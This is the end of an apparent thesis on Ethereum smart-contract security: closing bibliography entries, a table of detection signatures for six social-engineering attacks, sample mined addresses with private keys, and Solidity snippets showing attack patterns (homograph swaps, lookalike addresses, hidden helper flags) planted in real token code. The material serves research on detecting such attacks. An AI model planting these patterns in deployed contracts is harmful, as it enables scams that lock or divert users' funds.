      Zurich, Department of Computer Science, 2018.
[257] Lenin Singaravelu, Calton Pu, Hermann Härtig, and Christian Helmuth. Reducing tcb com-
      plexity for security-sensitive applications: Three case studies. In Proceedings of the 1st
      ACM SIGOPS/EuroSys European Conference on Computer Systems 2006, pages 161–174,
      2006.
[258] Amritraj Singh, Reza M Parizi, Qi Zhang, Kim-Kwang Raymond Choo, and Ali Dehghan-
      tanha. Blockchain smart contracts formalization: Approaches and challenges to address
      vulnerabilities. Computers & Security, 88:101654, 2020.
[259] Saurabh Singh, Pradip Kumar Sharma, Byungun Yoon, Mohammad Shojafar, Gi Hwan Cho,
      and In-Ho Ra. Convergence of blockchain and artificial intelligence in iot network for the
      sustainable smart city. Sustainable Cities and Society, 63:102364, 2020.
[260] Sunbeom So, Seongjoon Hong, and Hakjoo Oh. Smartest: Effectively hunting vulnerable
      transaction sequences in smart contracts through language model-guided symbolic execution.
      In 30th USENIX Security Symposium (USENIX Security 21), 2021.
[261] Sunbeom So, Myungho Lee, Jisu Park, Heejo Lee, and Hakjoo Oh. Verismart: A highly
      precise safety verifier for ethereum smart contracts. In 2020 IEEE Symposium on Security
      and Privacy (SP), pages 1678–1694. IEEE, 2020.
[262] Yonatan Sompolinsky, Yoad Lewenberg, and Aviv Zohar. Spectre: A fast and scalable cryp-
      tocurrency protocol. IACR Cryptol. ePrint Arch., 2016:1159, 2016.
                                                225


[263] Jon Stephens, Kostas Ferles, Benjamin Mariano, Shuvendu Lahiri, and Isil Dillig. Smart-
      pulse: Automated checking of temporal properties in smart contracts. In IEEE S&P, 2021.
[264] Liya Su, Xinyue Shen, Xiangyu Du, Xiaojing Liao, XiaoFeng Wang, Luyi Xing, and Baoxu
      Liu. Evil under the sun: Understanding and discovering attacks on ethereum decentralized
      applications. In 30th USENIX Security Symposium (USENIX Security 21), 2021.
[265] Nick Szabo. Smart contracts: building blocks for digital markets. EXTROPY: The Journal
      of Transhumanist Thought,(16), 18:2, 1996.
[266] Janos Szurdi, Balazs Kocso, Gabor Cseh, Jonathan Spring, Mark Felegyhazi, and Chris
      Kanich. The long “taile” of typosquatting domain names. In 23rd {USENIX} Security
      Symposium ({USENIX} Security 14), pages 191–206, 2014.
[267] Sergei Tikhomirov, Ekaterina Voskresenskaya, Ivan Ivanitskiy, Ramil Takhaviev, Evgeny
      Marchenko, and Yaroslav Alexandrov. Smartcheck: Static analysis of ethereum smart con-
      tracts. In Proceedings of the 1st International Workshop on Emerging Trends in Software
      Engineering for Blockchain, pages 9–16, 2018.
[268] Palina Tolmach, Yi Li, Shang-Wei Lin, Yang Liu, and Zengxiang Li. A survey of smart
      contract formal specification and verification. ACM Computing Surveys (CSUR), 54(7):1–
      38, 2021.
[269] Christof Ferreira Torres, Julian Schütte, and Radu State. Osiris: Hunting for integer bugs in
      ethereum smart contracts. In Proceedings of the 34th Annual Computer Security Applications
      Conference, pages 664–676, 2018.
[270] Christof Ferreira Torres, Mathis Steichen, et al. The art of the scam: Demystifying honeypots
      in ethereum smart contracts. In 28th USENIX Security Symposium (USENIX Security 19),
      pages 1591–1607, 2019.
[271] Petar Tsankov, Andrei Dan, Dana Drachsler-Cohen, Arthur Gervais, Florian Buenzli, and
      Martin Vechev. Securify: Practical security analysis of smart contracts. In Proceedings
      of the 2018 ACM SIGSAC Conference on Computer and Communications Security, pages
      67–82, 2018.
[272] Anna Vacca, Andrea Di Sorbo, Corrado A. Visaggio, and Gerardo Canfora. A systematic
      literature review of blockchain and smart contract development: Techniques, tools, and open
      challenges. Journal of Systems and Software, 174:110891, 2021.
[273] Amber Van Der Heijden and Luca Allodi. Cognitive triaging of phishing attacks. In 28th
      {USENIX} Security Symposium ({USENIX} Security 19), pages 1309–1326, 2019.
[274] Anqi Wang, Hao Wang, Bo Jiang, and Wing Kwong Chan. Artemis: An improved smart
      contract verification tool for vulnerability detection. In 2020 7th International Conference
      on Dependable Systems and Their Applications (DSA), pages 173–181. IEEE, 2020.
[275] Baocheng Wang, Jiawei Sun, Yunhua He, Dandan Pang, and Ningxiao Lu. Large-scale
      election based on blockchain. Procedia Computer Science, 129:234–237, 2018.
                                                 226


[276] Bin Wang, Han Liu, Chao Liu, Zhiqiang Yang, Qian Ren, Huixuan Zheng, and Hong Lei.
      Blockeye: Hunting for defi attacks on blockchain. In 2021 IEEE/ACM 43rd International
      Conference on Software Engineering: Companion Proceedings (ICSE-Companion), pages
      17–20. IEEE, 2021.
[277] Dong Wang, Bo Jiang, and WK Chan. Wana: Symbolic execution of wasm bytecode for
      cross-platform smart contract vulnerability detection. arXiv preprint arXiv:2007.15510,
      2020.
[278] Haijun Wang, Yi Li, Shang-Wei Lin, Lei Ma, and Yang Liu. Vultron: catching vulnera-
      ble smart contracts once and for all. In 2019 IEEE/ACM 41st International Conference on
      Software Engineering: New Ideas and Emerging Results (ICSE-NIER), pages 1–4. IEEE,
      2019.
[279] Jiaping Wang and Hao Wang. Monoxide: Scale out blockchains with asynchronous consen-
      sus zones. In 16th {USENIX} Symposium on Networked Systems Design and Implementation
      ({NSDI} 19), pages 95–112, 2019.
[280] Shuai Wang, Chengyu Zhang, and Zhendong Su. Detecting nondeterministic payment
      bugs in ethereum smart contracts. Proceedings of the ACM on Programming Languages,
      3(OOPSLA):1–29, 2019.
[281] Wei Wang, Jingjing Song, Guangquan Xu, Yidong Li, Hao Wang, and Chunhua Su. Con-
      tractward: Automated vulnerability detection models for ethereum smart contracts. IEEE
      Transactions on Network Science and Engineering, 2020.
[282] Yajing Wang, Jingsha He, Nafei Zhu, Yuzi Yi, Qingqing Zhang, Hongyu Song, and Ruixin
      Xue. Security enhancement technologies for smart contracts in the blockchain: A survey.
      Transactions on Emerging Telecommunications Technologies, 32(12):e4341, 2021.
[283] Yuepeng Wang, Shuvendu K Lahiri, Shuo Chen, Rong Pan, Isil Dillig, Cody Born, Immad
      Naseer, and Kostas Ferles. Formal verification of workflow policies for smart contracts
      in azure blockchain. In Working Conference on Verified Software: Theories, Tools, and
      Experiments, pages 87–106. Springer, 2019.
[284] Zeli Wang, Hai Jin, Weiqi Dai, Kim-Kwang Raymond Choo, and Deqing Zou. Ethereum
      smart contract security research: survey and future research opportunities. Frontiers of
      Computer Science, 15(2):1–18, 2021.
[285] Colin Whittaker, Brian Ryner, and Marria Nazif. Large-scale automatic classification of
      phishing pages. In Proc. of NDSS, 2010.
[286] O Williams-Grut. Estonia is using the technology behind bitcoin to secure 1 million health
      records. Bus Insid, 2016.
[287] Gavin Wood. Polkadot: Vision for a heterogeneous multi-chain framework. White Paper,
      2016.
                                               227


[288] Gavin Wood et al. Ethereum: A secure decentralised generalised transaction ledger.
      Ethereum project yellow paper, 151(2014):1–32, 2014.
[289] Lei Wu, Siwei Wu, Yajin Zhou, Runhuai Li, Zhi Wang, Xiapu Luo, Cong Wang, and Kui
      Ren. Ethscope: A transaction-centric security analytics framework to detect malicious smart
      contracts on ethereum.
[290] Siwei Wu, Dabao Wang, Jianting He, Yajin Zhou, Lei Wu, Xingliang Yuan, Qinming He,
      and Kui Ren. Defiranger: Detecting price manipulation attacks on defi applications. arXiv
      preprint arXiv:2104.15068, 2021.
[291] Valentin Wüstholz and Maria Christakis. Harvey: A greybox fuzzer for smart contracts. In
      Proceedings of the 28th ACM Joint Meeting on European Software Engineering Conference
      and Symposium on the Foundations of Software Engineering, pages 1398–1409, 2020.
[292] Xinyu Xing, Jianxun Dang, Shivakant Mishra, and Xue Liu. A highly scalable bandwidth
      estimation of commercial hotspot access points. In 2011 Proceedings IEEE INFOCOM,
      pages 1143–1151, 2011.
[293] Wentian Yan, Jianbo Gao, Zhenhao Wu, Yue Li, Zhi Guan, Qingshan Li, and Zhong Chen.
      Eshield: protect smart contracts against reverse engineering. In Proceedings of the 29th
      ACM SIGSOFT International Symposium on Software Testing and Analysis, pages 553–556,
      2020.
[294] Zheng Yang and Hang Lei. Lolisa: Formal syntax and semantics for a subset of the solidity
      programming language. arXiv e-prints, pages arXiv–1803, 2018.
[295] Zhiqiang Yang, Han Liu, Yue Li, Huixuan Zheng, Lei Wang, and Bangdao Chen. Ser-
      aph: enabling cross-platform security analysis for evm and wasm smart contracts. In 2020
      IEEE/ACM 42nd International Conference on Software Engineering: Companion Proceed-
      ings (ICSE-Companion), pages 21–24. IEEE, 2020.
[296] Jiaming Ye, Mingliang Ma, Yun Lin, Yulei Sui, and Yinxing Xue. Clairvoyance: Cross-
      contract static analysis for detecting practical reentrancy vulnerabilities in smart contracts.
      In 2020 IEEE/ACM 42nd International Conference on Software Engineering: Companion
      Proceedings (ICSE-Companion), pages 274–275. IEEE, 2020.
[297] Haifeng Yu, Ivica Nikolić, Ruomu Hou, and Prateek Saxena. Ohie: Blockchain scaling
      made simple. In 2020 IEEE Symposium on Security and Privacy (SP), pages 90–105. IEEE,
      2020.
[298] Mahdi Zamani, Mahnush Movahedi, and Mariana Raykova. Rapidchain: Scaling blockchain
      via full sharding. In Proceedings of the 2018 ACM SIGSAC Conference on Computer and
      Communications Security, pages 931–948, 2018.
[299] Mengya Zhang, Xiaokuan Zhang, Yinqian Zhang, and Zhiqiang Lin. TXSPECTOR: Uncov-
      ering attacks in ethereum from transactions. In USENIX Security, 2020.
                                                228


[300] Mian Zhang and Yuhong Ji. Blockchain for healthcare records: A data perspective. PeerJ
      Preprints, 6:e26942v1, 2018.
[301] Pengcheng Zhang, Feng Xiao, and Xiapu Luo. Soliditycheck: Quickly detecting smart
      contract problems through regular expressions. arXiv preprint arXiv:1911.09425, 2019.
[302] Pengcheng Zhang, Feng Xiao, and Xiapu Luo. A framework and dataset for bugs in ethereum
      smart contracts. In 2020 IEEE International Conference on Software Maintenance and Evo-
      lution (ICSME), pages 139–150. IEEE, 2020.
[303] Qingzhao Zhang, Yizhuo Wang, Juanru Li, and Siqi Ma. Ethploit: From fuzzing to efficient
      exploit generation against smart contracts. In 2020 IEEE 27th International Conference on
      Software Analysis, Evolution and Reengineering (SANER), pages 116–126. IEEE, 2020.
[304] William Zhang, Sebastian Banescu, Leonardo Pasos, Steven Stewart, and Vijay Ganesh.
      Mpro: Combining static and symbolic analysis for scalable testing of smart contract. In 2019
      IEEE 30th International Symposium on Software Reliability Engineering (ISSRE), pages
      456–462. IEEE, 2019.
[305] Yuyao Zhang, Siqi Ma, Juanru Li, Kailai Li, Surya Nepal, and Dawu Gu. Smartshield:
      Automatic smart contract protection made easy. In 2020 IEEE 27th International Conference
      on Software Analysis, Evolution and Reengineering (SANER), pages 23–34. IEEE, 2020.
[306] Ma Zhaofeng, Wang Lingyun, Wang Xiaochang, Wang Zhen, and Zhao Weizhe. Blockchain-
      enabled decentralized trust management and secure usage control of iot big data. IEEE
      Internet of Things Journal, 7(5):4000–4015, 2019.
[307] Ence Zhou, Song Hua, Bingfeng Pi, Jun Sun, Yashihide Nomura, Kazuhiro Yamashita, and
      Hidetoshi Kurihara. Security assurance for smart contract. In 2018 9th IFIP International
      Conference on New Technologies, Mobility and Security (NTMS), pages 1–5. IEEE, 2018.
[308] Qiheng Zhou, Huawei Huang, Zibin Zheng, and Jing Bian. Solutions to scalability of
      blockchain: A survey. IEEE Access, 8:16440–16455, 2020.
[309] Shunfan Zhou, Malte Möser, Zhemin Yang, Ben Adida, Thorsten Holz, Jie Xiang, Steven
      Goldfeder, Yinzhi Cao, Martin Plattner, Xiaojun Qin, et al. An ever-evolving game: Evalua-
      tion of real-world attacks and defenses in ethereum ecosystem. In 29th {USENIX} Security
      Symposium ({USENIX} Security 20), pages 2793–2810, 2020.
[310] Yi Zhou, Deepak Kumar, Surya Bakshi, Joshua Mason, Andrew Miller, and Michael Bailey.
      Erays: reverse engineering ethereum’s opaque smart contracts. In 27th USENIX Security
      Symposium (USENIX Security 18), pages 1371–1385, 2018.
[311] Weiqin Zou, David Lo, Pavneet Singh Kochhar, Xuan-Bach D Le, Xin Xia, Yang Feng,
      Zhenyu Chen, and Baowen Xu. Smart contract development: Challenges and opportunities.
      IEEE Transactions on Software Engineering, 2019.
                                               229


                                                               APPENDIX
A: Attack Signatures
Table 8.1 provides a full list of signatures that we use to detect potential social engineering attacks,
based on which we generate the CNF detection rule for each of the six social engineering attacks,
which are defined as follows:
               CN F (A1 ) = S1 ∧ (S2 ∨ S3 ∨ S4 ) ∧ S5
               CN F (A2 ) = (S2 ∨ S3 ∨ S4 ) ∧ S5 ∧ S6 ∧ (S7 ∨ S8 ) ∧ S9
               CN F (A3 ) = S5 ∧ S10 ∧ (S11 ∨ S12 ∨ S13 ∨ S14 ) ∧ S15
               CN F (A4 ) = S5 ∧ (S11 ∨ S12 ∨ S13 ∨ S14 ) ∧ S16 ∧ (S17 ∨ S18 )
               CN F (A5 ) = S5 ∧ (S11 ∨ S12 ∨ S13 ∨ S14 ) ∧ (S19 ∨ S20 ) ∧ S21
               CN F (A6 ) = S5 ∧ (S11 ∨ S12 ∨ S13 ∨ S14 ) ∧ (S19 ∨ S20 ) ∧ S21 ∧ S22
Table 8.1: The full list of signatures used for automated detection of the six social engineering
attacks.
    Symbol                                   Social Engineering Signature                               Matching Attacks
      S1             Non-constructor public or external function that alters an address variable        A1
      S2          Ether transfer with another Ether transfer in the call stack of the same transaction  A1 , A2
      S3       Ether transfer with call-with-value statement in the call stack of the same transaction  A1 , A2
      S4             Ether transfer with a token transfer in the call stack of the same transaction     A1 , A2
      S5                                  Smart contract has a payable function                         A1 , A2 , A3 , A4 , A5 , A6
      S6                       emit instruction inside a call stack of a payable function               A2
      S7                    Constant variable with address type and a hard-coded value                  A2
      S8                  Non-constant variable with address type and a hard-coded value                A2
      S9               Ether transfer to an address variable initialized with a hard-coded value        A2
     S10                                        Hard-coded bytes32 value                                A3
     S11                                  Ether transfer inside a branching arm                         A3 , A4 , A5 , A6
     S12                                  Token transfer inside a branching arm                         A3 , A4 , A5 , A6
     S13          Ether transfer with a require statement in the call stack of the same transaction     A3 , A4 , A5 , A6
     S14         Token transfer with a require statement in the call stack of the same transaction      A3 , A4 , A5 , A6
     S15                              bytes32 value inside a branching condition                        A3
     S16                                 Comparison of Keccak256 hash values                            A4
     S17                              String literal as part of a branching condition                   A4
     S18                              String literal as part of a require statement                     A4
     S19   Ether transfer with call or delegatecall statement in the call stack of the same transaction A5 , A6
     S20   Token transfer with call or delegatecall statement in the call stack of the same transaction A5 , A6
     S21                  String literal with a non-ASCII symbol somewhere in the contract              A5 , A6
     S22                               ICC status is used in a require statement                        A6
                                                                      230


                       Table 8.2: Sample lowercase EIP-55-compliant addresses.
              EIP-55-compliant Lowercase Address        Private Key of the Account  Mining Time (ms)
                                                   bed6ad86fa57efe205abdcda885b3010
        0x47aa51fd5a98e155623202944c44f414a7205a46                                       6,822
                                                   7b1a75d6196b271d4785cd3ed66c8d5d
                                                   4856d3e9c032724eca42a5fd48e99dc5
        0x8310561552fa9569337d53493c6a5a8991894072                                       3,137
                                                   b77cb5be96ca68eb9e03511257999e61
                                                   1321d554cddf1b756e8d15cba0a33fb4
        0x2797a2c394686d33da258c7de6206617c398605e                                        460
                                                   e84b95119acf8e267f7505f29f652020
                                                   1265ca0334308e3dfb2ddd9a7eb466aa
        0x596443674c431e7da447803ef94a7e52cfd71169                                       1,954
                                                   488a863671e6ad6290d93383489159d1
                                                   a532795660fbb9ccb5f3862e102f1968
        0x52206f3a3b80212898760a6ae124474183b30612                                        266
                                                   0a5def583aea24a2875de7f1dd6c8298
                                                   3b1b3a32d73bd32f837440cd0469a801
        0xc71c3eec3aa44e7746725fc771b8b821419e4360                                       4,896
                                                   0fa6f3e02358ffeb76c95454ee2a0e36
 1 if( keccak256 (abi. encode ( symbol )) == keccak256 (abi. encode ("USDT"))) {
 2    return super . transfer (_to , _value );
 3 }
Figure 8.1: Integration of the A4 attack pattern into the transfer ERC-20 method of Tether stable-
coin source code.
B: Address Miner
We develop an address miner to mine Ethereum addresses with all lower-case EIP-55 checksums.
Table 8.2 shows five sample addresses. Such addresses can be used in the A3 attack.
C: Integrating Social Engineering Attack Patterns in Existing To-
kens
A4 Attack Pattern Integration in USDT: In Fig. 8.1, we show that without changing the logic
of the smart contract, the A4 social engineering attack pattern can be integrated into the Tether
stablecoin source code. Specifically, in the Tether USD token, we add a seemingly harmless check
of the token symbol within the ERC-20 transfer. The evasive test deployment uses all-Latin
characters for token symbols, whereas the malicious smart contract is deployed by passing to the
constructor a token symbol with unnoticeable substitution of one character, which leads to the
failure of the fund transfer.
A5 Attack Pattern Integration in BNB: Fig. 8.2 shows an integration of the A5 attack pattern
into the Binance exchange token source code. Fig. 8.3 shows the helper class for the A5 attack in
                                                   231


 1 address consolidatedDBAddress =
 2    0 x51Db8896d6bD64385C5785Df0685cc4C24F01F0f ;
 3 bytes memory payload = abi. encodeWithSignature (" logVolume (address , uint256 )"
        , _to , _value );
 4 bool success = address ( consolidatedDBAddress ).call( payload );
 5 if( success ) {
 6     balanceOf [msg. sender ] = SafeMath . safeSub ( balanceOf [msg. sender ], _value );
 7     balanceOf [_to] = SafeMath . safeAdd ( balanceOf [_to], _value );
 8     Transfer (msg.sender , _to , _value );
 9 }
Figure 8.2: Integration of the A5 attack pattern into the transfer method of the Binance exchange
token source code.
 1 function logVolume ( address client , uint256 amount ) public {
 2     require (msg. sender == authorizedCallerSmartContract );
 3     clientVolumes [ client ] += amount ;
 4 }
Figure 8.3: Function logVolume in the helper contract used for the A5 attack in the Binance ex-
change token.
the Binance Token. In the transfer method (Fig. 8.2), we insert a logging routine, which saves the
transfer record in a consolidated database in another smart contract (Fig. 8.3). In a test deployment,
the code performs logging as expected. However, in the final deployment, the owner replaces
one letter in the logging function header with a homograph twin, e.g., the second letter “o” with
the identically-looking Cyrillic letter. The log call (Fig. 8.2, line 3) throws an exception and the
transfer fails.
A1 Attack Pattern Integration in LINK: In this token, the malicious smart contract owner mines
a similar public address with the same EIP-55 checksum as in the original address, and initializes
vipClient via the constructor (Fig. 8.4, line 5). As a result, the VIP user, who does not recognize
the address falsification, will fail to transfer funds.
A6 Attack Pattern Integration in LEO: Fig. 8.5 shows an integration of the A6 attack pattern into
the token’s source code. Fig. 8.6 shows the helper class for the A6 attack in the Bitfinex Token. In
this token, a helper smart contract is used by the attacker for purported protection against transfer
flood, i.e., performing too many small transfers by one user. The smart contract (see Fig. 8.6) has
two functions, logAndCheck, and seemingly unrelated and benign onCurve34906537. However,
                                                    232


 1  function LinkToken ( address vc) public
 2 {
 3    balances [msg. sender ] = totalSupply ;
 4    transferAllowedAfterBlock = block . number + (2 * 365 * 24 * 60 * 6);
 5    vipClient = vc;
 6   owner = msg. sender ;
 7 }
 8  ...
 9  function transfer ( address _to , uint _value ) public
10  validRecipient (_to) returns (bool success ) {
11    if( block . number > transferAllowedAfterBlock || msg. sender == vipClient ||
            msg. sender == owner ) {
12       return super . transfer (_to , _value );
13    }
14 }
Figure 8.4: Integration of the A1 attack pattern into the transfer method of the ChainLink oracle
token source code.
 1 address floodProtectionSC =
 2    0 x5B38C7add838EfFF53412C71E9efF5c182c6b407 ;
 3 bytes memory payload = abi. encodeWithSignature (" logAndCheck ( address )", msg.
        sender );
 4 (bool succ , bytes memory result ) = address ( floodProtectionSC ).call( payload )
        ;
 5 require (succ);
 6 if(abi. decode (result , (bool)) == true) {
 7    doTransfer (msg.sender , _to , _amount );
 8    return true;
 9 }
Figure 8.5: Integration of the A6 attack pattern into the transfer ERC-20 call of the Bitfinex LEO
source code.
the latter function is the one called by the token smart contract due to homograph substitution of
several symbols in the call argument. Unlike in the A5 attack against the BNB token, the attack
A6 does not require to change the original ICC header before the production deployment. Instead,
the contract owner simply changes the value of extraFeaturesEnabled flag to activate the attack.
Hybrid Attack Pattern Integration in CK: Fig. 8.7 shows an integration of the hybrid A1 /A2
attack pattern into the CryptoKitties ERC-721 collectible source code. The CryptoKitties smart
contract can accept and withdraw Ether. In the function withdrawBalance (see Fig. 8.7), send is
preceded by a seemingly safe and reasonable fee collection. This arrangement works impeccably
during the testing. However, after the production deployment, the owner of the contract deploys a
                                                 233


 1 function onCurve34906537 ( address ) public view returns (bool) {
 2   if( extraFeaturesEnabled ) {
 3      return true;
 4   }
 5   return false ;
 6 }
 7 function logAndCheck ( address client ) public returns (bool) {
 8   require (msg. sender == authorizedCallerSmartContract );
 9   calls [ client ] += 1;
10   return true;
11 }
Figure 8.6: Function onCurve34906537 is called instead of logAndCheck in the Helper contract,
which is used for the A6 attack in the Bitfinex LEO token.
 1 address public fee_collector =
 2   0 xce02be9dfc4c68bae86a0bdf1bab68de77bb0d8d ;
 3 function withdrawBalance () external onlyCEO {
 4   uint256 balance = this. balance ;
 5   uint256 subtractFees = ( pregnantKitties + 1) * autoBirthFee ;
 6   if ( balance > subtractFees ) {
 7      fee_collector . transfer ( subtractFees );
 8      cfoAddress .send( balance - subtractFees );
 9   }
10 }
Figure 8.7: A hybrid A1 + A2 attack pattern integrated into the withdrawBalance function of the
CryptoKitties ERC-721 collectible source code.
non-payable smart contract at the address stored in fee_collector: such a substitution is possible
because the address has been pre-calculated in advance as described in Section 2.4.
                                                234